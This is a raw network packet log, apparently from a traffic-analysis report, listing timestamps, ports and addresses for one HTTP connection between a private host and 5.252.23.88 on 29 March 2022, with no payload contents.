Mar 29, 2022 06:51:53.229970932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.229971886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.229995966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.230006933 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.230012894 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.230020046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.230041981 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.230406046 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.259957075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260076046 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260154009 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260169983 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260176897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260323048 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260370970 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260377884 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260607958 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260668993 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260708094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260708094 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260715961 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260745049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260783911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260792017 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260796070 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260839939 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260844946 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260849953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260876894 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260890007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260905027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260911942 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260912895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260936022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260960102 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.260962009 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260971069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.260983944 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261006117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261029005 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261039972 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261044025 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261053085 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261076927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261101007 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261121988 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261125088 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261126995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261151075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261173964 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261194944 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261195898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261199951 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261218071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261241913 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261262894 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261267900 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261296034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261320114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261341095 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261342049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261346102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261365891 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261390924 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261394978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261399984 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261415005 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261449099 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261471033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261476994 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261482000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261492014 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261516094 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261538982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261553049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261557102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261562109 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261584997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261605024 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261616945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261621952 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261629105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261651039 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261672974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261693001 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261696100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261697054 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261718035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261742115 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261755943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261760950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261765003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261786938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261807919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261812925 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261816978 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261831045 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261853933 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261864901 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261869907 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261876106 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261898041 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261919975 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261939049 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261943102 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.261941910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261965036 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.261986971 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262002945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262007952 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262010098 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262032986 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262056112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262061119 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262065887 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262078047 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262101889 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262123108 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262124062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262125969 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262150049 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262192965 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262196064 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262201071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262217045 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262240887 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262264013 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262264967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262269020 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262290955 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262300968 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262303114 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262305021 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262326956 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262355089 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262362003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262365103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262366056 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262370110 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262388945 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262412071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262415886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262420893 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262434006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262456894 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262458086 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262461901 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262497902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262497902 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262501955 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262521029 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262542963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262566090 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262567043 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262571096 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262588978 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262605906 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262609959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262613058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262635946 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262648106 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262651920 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262656927 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262679100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262692928 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262697935 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262701035 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262721062 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262736082 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262739897 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262742996 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262764931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262778044 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262783051 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262785912 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262809038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262820959 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262825012 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262831926 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262854099 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262866974 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262871981 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262876034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262908936 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262912989 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.262914896 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262937069 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262959003 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.262980938 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263001919 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263012886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263017893 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263026953 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263051033 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263072968 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263092995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263094902 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263098955 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263119936 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263144016 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263164997 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263164997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263169050 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263189077 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263211966 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263233900 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263242960 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263247967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263257027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263282061 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263303995 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263303995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263308048 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263328075 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263350010 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263351917 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263355970 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263372898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263395071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263406038 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263410091 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263417959 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263439894 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263463974 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263490915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263498068 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263501883 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263504028 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263525963 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263550043 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263567924 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263572931 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263572931 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263596058 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263617992 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263636112 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263641119 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263665915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263689995 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263710022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263712883 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263721943 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263735056 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263758898 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263778925 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263781071 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.263784885 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.263876915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.293718100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.293807030 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.293879032 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.293900967 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.293932915 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294007063 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294068098 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294071913 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294126034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294198990 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294261932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294358969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294425011 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294430017 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294452906 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294579983 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294650078 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294658899 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294667006 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294702053 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294737101 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294760942 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294785023 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294787884 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294795990 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294809103 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294831038 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294831038 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294857025 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294881105 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294902086 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294904947 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294907093 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294930935 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294955969 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294976950 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.294979095 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.294981003 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295002937 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295023918 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295044899 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295072079 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295094967 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295104027 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295109987 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295118093 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295140982 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295171022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295193911 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295213938 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295218945 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295252085 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295274973 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295295000 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295298100 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295300007 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295322895 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295337915 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295346022 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295368910 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295381069 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295384884 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295392990 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295416117 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295438051 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295461893 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295480013 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295483112 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295485973 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295507908 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295531034 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295557022 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295562983 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295562983 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295584917 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295608997 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295628071 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295630932 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295631886 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295655012 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295679092 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295701027 CEST	80	49793	5.252.23.88	192.168.2.7
Mar 29, 2022 06:51:53.295705080 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295710087 CEST	49793	80	192.168.2.7	5.252.23.88
Mar 29, 2022 06:51:53.295726061 CEST	80	49793	5.252.23.88	192.168.2.7
